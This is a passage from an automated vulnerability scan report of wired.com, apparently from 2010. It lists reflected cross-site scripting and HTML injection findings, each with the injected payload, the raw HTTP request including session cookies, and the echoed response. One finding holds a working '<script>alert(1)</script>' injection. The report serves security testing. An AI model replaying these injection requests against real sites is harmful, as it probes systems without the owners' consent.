The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:51 GMT
Date: Sun, 21 Nov 2010 23:06:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e">
...[SNIP]...

1.105. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:17 GMT
Date: Sun, 21 Nov 2010 23:06:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.106. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news">
...[SNIP]...

1.107. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:35 GMT
Date: Sun, 21 Nov 2010 23:06:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news">
...[SNIP]...

1.108. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:52 GMT
Date: Sun, 21 Nov 2010 23:06:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4">
...[SNIP]...

1.109. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news">
...[SNIP]...

1.110. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:40 GMT
Date: Sun, 21 Nov 2010 23:06:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news">
...[SNIP]...

1.111. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66359

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:04 GMT
Date: Sun, 21 Nov 2010 23:07:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2">
...[SNIP]...

1.112. http://www.wired.com/customerservice [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /customerservice

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Mon, 22 Nov 2010 01:13:02 GMT
Date: Mon, 22 Nov 2010 01:09:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_customerservice839c3"><a>d95b402d7c8">
...[SNIP]...

1.113. http://www.wired.com/entertainment [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainmenta7ac8"><a>98e7490e5ae">
...[SNIP]...

1.114. http://www.wired.com/entertainment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Sun, 21 Nov 2010 20:16:27 GMT
Date: Sun, 21 Nov 2010 20:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment5df5b"><a>b5f8392314c">
...[SNIP]...

1.115. http://www.wired.com/entertainment/hollywood [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:30 GMT
Date: Sun, 21 Nov 2010 23:07:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood">
...[SNIP]...

1.116. http://www.wired.com/entertainment/hollywood [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/hollywood

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29343
Vary: Accept-Encoding
Cache-Control: max-age=574
Expires: Sun, 21 Nov 2010 23:17:52 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e">
...[SNIP]...

1.117. http://www.wired.com/entertainment/music [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:32 GMT
Date: Sun, 21 Nov 2010 23:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment224ea"><a>7c815694db5 ss_music">
...[SNIP]...

1.118. http://www.wired.com/entertainment/music [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9">
...[SNIP]...

1.119. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news">
...[SNIP]...

